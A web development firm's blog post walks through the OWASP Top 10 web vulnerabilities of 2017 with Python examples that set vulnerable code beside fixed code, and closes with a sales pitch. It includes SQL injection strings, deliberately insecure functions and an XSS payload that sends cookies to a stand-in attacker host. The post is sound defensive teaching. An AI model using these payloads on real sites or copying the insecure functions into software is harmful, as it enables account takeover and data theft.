Cyber Security Vulnerabilities

Who should be aware of security vulnerabilities and why?

This post is for all kinds of readers: those who want to get up to speed on cyber security vulnerabilities, those in any profession or business niche who believe they already are, and those who have never looked at the subject at all. A website's security matters to its owner because a compromise costs customers and reputation, while a site that holds up keeps both. Unfortunately, a great many web applications are vulnerable, which is why the topic is so relevant today.

A security vulnerability in a web application gives an attacker an opportunity to compromise the site through mistakes in the application's code, in its configuration, or in the underlying operating system and server software. Below we walk through the most dangerous web application weaknesses of 2017 as ranked by the Open Web Application Security Project (OWASP), a non-profit community of companies, educational institutions and individuals worldwide that publishes free guidance on application security. The list here follows the 2017 Release Candidate of the OWASP Top 10, which is why "Insufficient Attack Protection" and "Underprotected APIs" appear as separate items; the final 2017 edition replaced them with other categories. If you want to avoid security vulnerabilities, you need to prevent every kind of weakness in the system, from the application itself (a WordPress install included) to anything else that leaves the data it handles exposed.

Security vulnerability type #1: Injection

First things first, the most important case. Almost every web application stores its data in a database and talks to it in SQL, a language that is easier than Japanese but more demanding than English. The application builds SQL statements to read, add, edit and remove data, for instance when you change your details in the user dashboard. If user input is pasted into such a statement without being handled correctly, an attacker can submit a specially crafted value that contains a fragment of SQL, and the database executes it as part of the query. This is called an injection. It is one of the most dangerous vulnerabilities because it can give the attacker full access to the database: reading, changing and even deleting its contents, your personal data included. Protection is straightforward: never build SQL by concatenating user input; pass values as parameters of a prepared statement so the database treats them as data, not as syntax. Our Direct Line Development specialists can review your code for this.
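The following is an added example, not code from the original post: the same login lookup written two ways against an in-memory SQLite database. The table, the two users and the attack strings are constructed for the illustration; passwords are kept in plain text here only to keep the injection demonstration short (see the Sensitive Data Exposure section for how they should really be stored).

```python
import sqlite3

# Constructed sample database: two users, plain-text passwords for brevity only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [("alice", "correct horse", 1), ("bob", "hunter2", 0)],
)


def find_user_vulnerable(username, password):
    """String formatting: the user's input becomes part of the SQL statement,
    so quotes and comment markers in it change what the query means."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def find_user_safe(username, password):
    """Parameterised query: the driver passes the values separately from the
    statement text, so the same inputs are compared as literal strings."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Two classic attack strings (constructed):
TAUTOLOGY = "' OR '1'='1"   # as password: WHERE ... AND password = '' OR '1'='1' is always true
COMMENT_OUT = "alice'--"    # as username: WHERE username = 'alice'-- ... the password test is commented away

if __name__ == "__main__":
    print(find_user_vulnerable("alice", "correct horse"))  # alice (legitimate)
    print(find_user_vulnerable("nobody", TAUTOLOGY))       # alice (bypassed)
    print(find_user_vulnerable(COMMENT_OUT, "wrong"))      # alice (bypassed)
    print(find_user_safe("nobody", TAUTOLOGY))             # None (rejected)
    print(find_user_safe(COMMENT_OUT, "wrong"))            # None (rejected)
```

The parameterised version is not "filtering" anything: it simply never lets the input be parsed as SQL, which is why it holds up against payloads nobody has thought of yet.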

Security vulnerability type #2: Broken Authentication and Session Management

What would your reaction be if you learned that a third party could get into your personal account? Broken Authentication and Session Management is a very common class of vulnerability: the attacker obtains or guesses keys, passwords or session tokens, and the application fails to notice. The weaknesses usually sit in the everyday account functions: "Remember me" (so comfy, isn't it?), password change and reset, logout, the secret question (mine is "Where did you spend your honeymoon?", what is yours?), account update, and session timeout.

How does it all work? A web application identifies its users by a session cookie. After you log in, the server issues an identifier that the browser stores and sends back with every subsequent request to the site; that is how the application knows it is you. BUT: if an attacker steals that identifier (or plants one in your browser before you log in and the application keeps using it afterwards), and the server does not validate the session properly, they act in the system with your account's privileges.

To protect yourself, follow these steps:

  1. Issue session identifiers that are long and random (from a cryptographic generator), and set the cookie with the HttpOnly, Secure and SameSite attributes so page scripts cannot read it and it never travels in clear text;
  2. Regenerate the session identifier at login and at any change of privilege, so an identifier planted before login is never promoted to an authenticated one;
  3. Optionally tie a session to the client's IP address, bearing in mind that legitimate users on mobile networks change addresses;
  4. Ask the user to authenticate again before important actions (changing the password or e-mail address, making a payment);
  5. Serve the whole site over HTTPS with a valid TLS certificate;
  6. Expire idle sessions after a short timeout and invalidate them on the server at logout, not just in the browser.
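An added example, not code from the original post, showing steps 1, 2, 5 and 6 of the list above in a minimal server-side session store. The class and function names, the 15-minute idle timeout and the injectable clock are assumptions made for the illustration; the IP binding of step 3 is deliberately left out because of its false positives.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # assumed policy: seconds of inactivity before a session dies


class SessionStore:
    """Server-side sessions keyed by an unguessable identifier."""

    def __init__(self, clock=time.time):
        self._sessions = {}   # session id -> {"user": ..., "last_seen": ...}
        self._clock = clock   # injectable so expiry can be tested without sleeping

    def create(self, user):
        """Issue a fresh identifier: 32 random bytes from the OS CSPRNG,
        URL-safe encoded (43 characters)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def login(self, old_sid, user):
        """Rotate the identifier at login so an id an attacker planted before
        authentication (session fixation) is discarded, not upgraded."""
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def resolve(self, sid):
        """Map a presented cookie value to a user; None if unknown or expired."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]   # idle too long: the server forgets it
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, sid):
        """Invalidate on the server; deleting the browser cookie alone leaves
        a stolen copy of the id valid."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid):
    """Cookie attributes: unreadable by page scripts (HttpOnly), sent only
    over HTTPS (Secure), and withheld from cross-site requests (SameSite)."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % sid


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create("anonymous")          # pre-login session
    sid = store.login(anon, "alice")          # new id issued at login
    print(store.resolve(anon), store.resolve(sid))   # None alice
    print(set_cookie_header(sid))
```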

Security vulnerability type #3: Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) lets an attacker run their own JavaScript in other users' browsers. In the stored variant, the malicious script is submitted as ordinary content (a comment, a profile field), saved in the database, and later sent to every visitor whose browser renders that page. With it a crafty attacker can steal session cookies, capture what the victim types, or silently change the account number in a wire transfer form. Disappointing only begins to describe it. The defence follows the same principle as for SQL injection: treat user input as data, and escape it for the context in which it is written into the page (HTML body, attribute value, URL, script). Be especially careful when you store HTML from users in the database and render it back later.
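An added example, not from the original post, rendering a stored comment unescaped and then escaped with Python's standard html module. The attacker's comment and the attribute payload are constructed; the function names are assumptions for the illustration.

```python
import html

# Constructed stored comment, as an attacker would submit it through the form:
# it ships the victim's cookies to a host the attacker controls.
ATTACKER_COMMENT = (
    '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
)


def render_comment_vulnerable(text):
    """Stored text dropped straight into the page: the browser parses the
    <script> tag and runs it for every visitor."""
    return "<div class='comment'>%s</div>" % text


def render_comment_safe(text):
    """HTML body context: < > & " ' become entities, so the browser displays
    the tag as text and never executes it."""
    return "<div class='comment'>%s</div>" % html.escape(text, quote=True)


def render_attr_safe(value):
    """Attribute context: escape quotes too and always wrap the value in
    quotes, otherwise a payload can close the attribute and add an event handler."""
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACKER_COMMENT))   # live <script> tag
    print(render_comment_safe(ATTACKER_COMMENT))         # &lt;script&gt;... inert
    print(render_attr_safe('" onfocus="alert(1)'))       # quotes neutralised
```

Escaping is context-specific: the same string needs different treatment inside a JavaScript block or a URL, which is why templating engines that auto-escape per context are preferable to hand-written string formatting.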

Security vulnerability type #4: Broken Access Control

Broken Access Control describes a vulnerability where the application does not check whether the requester is allowed to see or act on the object they asked for. Applications usually check access rights before rendering a page, but the same check has to run on every function that returns or changes data, including the asynchronous (AJAX or API) requests a page makes behind the scenes. If it does not, an attacker simply forges the request, changing an identifier in the URL or in the JSON body, and gets someone else's private data. The fix is to enforce the authorisation check on the server at every stage of serving the data, never relying on the user interface to hide the links. Or by calling us here at Direct Line Development!
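An added example, not from the original post, of the per-object check this section describes, written as a JSON API handler so it also covers the point made later under Underprotected APIs. The invoice table, the users and the request bodies are constructed; function names, status codes and the "admin" flag are assumptions for the illustration.

```python
import json

# Constructed data store: invoice id -> owner and contents.
INVOICES = {
    101: {"owner": "alice", "amount": 120.0},
    102: {"owner": "bob", "amount": 999.0},
}

ALICE = {"name": "alice", "admin": False}
AUDITOR = {"name": "carol", "admin": True}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(session_user, invoice_id):
    """Checks only that someone is logged in. Any user can read any invoice
    just by changing the id (insecure direct object reference)."""
    if session_user is None:
        raise Forbidden("login required")
    return json.dumps(INVOICES[invoice_id])


def get_invoice_safe(session_user, invoice_id):
    """Authorisation on the object itself: the caller must own the record or
    hold the admin role. Runs on every request, not only when the page that
    lists the links is drawn."""
    if session_user is None:
        raise Forbidden("login required")
    record = INVOICES.get(invoice_id)
    allowed = record is not None and (
        record["owner"] == session_user["name"] or session_user.get("admin", False)
    )
    if not allowed:
        # Same answer for "not yours" and "does not exist" so ids cannot be enumerated.
        raise Forbidden("not found")
    return json.dumps(record)


def handle_api_request(session_user, body):
    """Entry point a JSON API would expose: the id is validated as an integer
    before use, then the authorisation check decides. Returns (status, body)."""
    try:
        invoice_id = int(json.loads(body)["id"])
    except (ValueError, KeyError, TypeError):
        return 400, "bad request"
    try:
        return 200, get_invoice_safe(session_user, invoice_id)
    except Forbidden as exc:
        return 403, str(exc)


if __name__ == "__main__":
    print(get_invoice_vulnerable(ALICE, 102))          # bob's invoice leaks
    print(handle_api_request(ALICE, '{"id": 102}'))    # (403, 'not found')
    print(handle_api_request(ALICE, '{"id": 101}'))    # (200, '{"owner": "alice", ...}')
    print(handle_api_request(ALICE, '{"id": "1 OR 1=1"}'))  # (400, 'bad request')
```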

Security vulnerability type #5: Security Misconfiguration

The next type is Security Misconfiguration, and it is frequent indeed. Frankly, web applications and servers are misconfigured far more often than they are configured properly. This is why we can't have nice things!

First, a secure application needs a hardened configuration across the whole stack: the operating system, the web server, the database server and the application framework. Second, never leave default settings in place (default accounts and passwords, sample applications, debug modes, directory listings, verbose error pages) and keep all software patched. These weaknesses are found constantly, and a timely update closes most of them before anyone exploits them. And if you would rather not track all that yourself: contact us!

Security vulnerability type #6: Sensitive Data Exposure

How should data be protected? Let's look at cryptography and resource protection. Sensitive data should be encrypted both in transit and at rest. Credit card numbers must never be stored unencrypted, and passwords must never be stored at all: keep only a salted hash computed with a slow, purpose-built password hashing function (bcrypt, scrypt, Argon2 or PBKDF2), never a plain MD5 or SHA-1 digest and never reversible encryption. Use strong, standard algorithms: AES for data you need to read back, RSA or elliptic-curve keys for key exchange and signatures, and never a home-grown scheme. If in doubt, stick to a well-reviewed library's defaults.

Some web applications keep personal data such as card details and credentials in plain form on the server, so once the server is breached the data is immediately usable. The second example is transferring data over plain HTTP. Traffic from a user to the server passes through many nodes: the home router, the ISP's routers, the data centre's routers and so on. Anyone who controls one of those hops, or who has planted a sniffer on it, can read and alter everything that passes through in the clear.

To sum up, make sure you:

  • Encrypt personal data at rest, so that a copy taken from a compromised server or backup is useless without the key;
  • Transfer sensitive data only over HTTPS, which is ordinary HTTP carried inside an encrypted and authenticated TLS connection. HTTPS protects you from eavesdropping and tampering by anyone sitting on the network path.

Security vulnerability type #7: Insufficient Attack Protection

Most web applications neither detect, prevent nor respond to attacks: an attacker can probe for injection points or try thousands of passwords without anything noticing. As a first line of defence we recommend a web application firewall (WAF), a component placed in front of the application that inspects requests, blocks known attack patterns and rate-limits abusive clients. Beyond the WAF, the application itself should log authentication failures and invalid input and react to them, for example by locking or slowing down a client that fails too often.
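An added example, not from the original post, of the kind of detection logic this section calls for: a sliding-window count of failed logins per client address run over access-log lines. The log lines are constructed, not real traffic; the line format, the threshold of five failures in sixty seconds and the function name are assumptions for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed access-log lines: timestamp, client ip, method, path, status.
# 203.0.113.5 fails the login repeatedly and then succeeds on the seventh try.
SAMPLE_LOG = """\
2017-05-01T10:00:01Z 203.0.113.5 POST /login 401
2017-05-01T10:00:02Z 203.0.113.5 POST /login 401
2017-05-01T10:00:02Z 198.51.100.7 GET /dashboard 200
2017-05-01T10:00:03Z 203.0.113.5 POST /login 401
2017-05-01T10:00:04Z 203.0.113.5 POST /login 401
2017-05-01T10:00:05Z 203.0.113.5 POST /login 401
2017-05-01T10:00:06Z 203.0.113.5 POST /login 401
2017-05-01T10:00:07Z 198.51.100.7 POST /login 401
2017-05-01T10:00:08Z 203.0.113.5 POST /login 200
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
THRESHOLD = 5   # assumed policy: this many failed logins ...
WINDOW = 60     # ... within this many seconds flags the client


def detect_brute_force(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: timestamp_string} for each client that crossed the
    failure threshold, keyed on the line that tripped it. Keeps a per-IP
    deque of failure times and drops entries older than the window."""
    failures = defaultdict(deque)
    flagged = {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue   # malformed line: skip rather than crash the monitor
        ts_str, ip, method, path, status = m.groups()
        if not (method == "POST" and path == "/login" and status == "401"):
            continue
        ts = (
            datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
            .replace(tzinfo=timezone.utc)
            .timestamp()
        )
        q = failures[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts_str
    return flagged


if __name__ == "__main__":
    print(detect_brute_force(SAMPLE_LOG))   # {'203.0.113.5': '2017-05-01T10:00:05Z'}
```

In the sample the attacker is flagged at 10:00:05, three seconds before the guess that succeeds; a WAF or the application would use that signal to block or throttle the address.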

Security vulnerability type #8: Cross-Site Request Forgery (CSRF)

Imagine a user visiting a page set up by an attacker while still logged in to your site. That page contains a hidden form or script that sends a request to your server to perform some harmful action, say a money transfer. How does it work? The attacker's page cannot read the victim's cookies, but it does not need to: the browser automatically attaches your site's cookies to any request aimed at it, so the server sees a properly authenticated request and carries out the action on the user's behalf.

One defence is to associate each user session with an additional secret, unique token. The token is embedded in every form or request that changes state, and the server checks it before acting. An attacker's page cannot obtain the token for someone else's session, so forged requests fail the check. Setting the SameSite attribute on the session cookie adds a second layer by keeping the browser from sending the cookie on cross-site requests at all.
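An added example, not from the original post, of the per-session token check described above. Here the token is derived from the session identifier with an HMAC under a server-side key, which avoids storing a second secret per session; keeping a random token in the session record instead is an equally valid design. The handler, the form fields and the per-process key are assumptions for the illustration (a real deployment loads the key from configuration so it survives restarts).

```python
import hashlib
import hmac
import secrets

# Assumed: in production this comes from configuration; generated per process here.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token bound to one session: an attacker who somehow obtains the token
    of their own session cannot reuse it against a victim's session."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, presented) -> bool:
    """Constant-time comparison; a missing token counts as a failure."""
    if not isinstance(presented, str):
        return False
    return hmac.compare_digest(csrf_token(session_id), presented)


def transfer_money(session_id: str, form: dict):
    """State-changing handler. The session cookie alone is not enough: the
    request must also carry the token that only a page served by this site
    (and read by this user's browser) could have embedded."""
    if not verify_csrf(session_id, form.get("csrf_token")):
        return 403, "csrf check failed"
    return 200, "moved %s to %s" % (form["amount"], form["to"])


if __name__ == "__main__":
    victim = "session-of-victim"
    # Legitimate form rendered by our site includes the token as a hidden field.
    legit = {"csrf_token": csrf_token(victim), "amount": "100", "to": "bob"}
    # Forged form on the attacker's page: cookies are sent, but no valid token.
    forged = {"amount": "100", "to": "attacker"}
    print(transfer_money(victim, legit))    # (200, 'moved 100 to bob')
    print(transfer_money(victim, forged))   # (403, 'csrf check failed')
```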

Security vulnerability type #9: Using Components with Known Vulnerabilities

Why is it unsafe to use components with known vulnerabilities? When an application relies on third-party libraries and plugins, attackers study those components' published flaws, because one exploit then works against every site that has not updated. This happens constantly with WordPress plugins, for example.

It is vital to run current versions of components, update them promptly, keep track of newly disclosed vulnerabilities in the ones you use, and avoid obscure or unmaintained ones. As you can see, there is a lot to keep an eye on. Why not simply call us?

Security vulnerability type #10: Underprotected APIs

Here is a horror story about those who leave their APIs unprotected and neglect security. An unprotected API leaves the database open to be plundered by cyber criminals, and we all know what happens to stolen sensitive information: victims are blackmailed, their bank accounts emptied, and the database itself sold on the black market. APIs must apply the same checks as the web pages: the caller's access rights to each object must be verified, input must be validated before it reaches a query (an SQL injection fits just as easily inside a JSON field as in a form), and the session and CSRF controls described above apply as well.

The conclusion: let your cyber security be our goal!

One more thing: back up your web application regularly and keep the backups separate from the server (and encrypted), so that data is never lost and can be restored at any time. Better still, let a team of professionals take care of your website for you.

The good news is that Direct Line Development will be happy to take care of your web application's security. We have a collection of solutions that may help your business. If you have any questions, feel free to call us or leave a comment. You are very welcome!
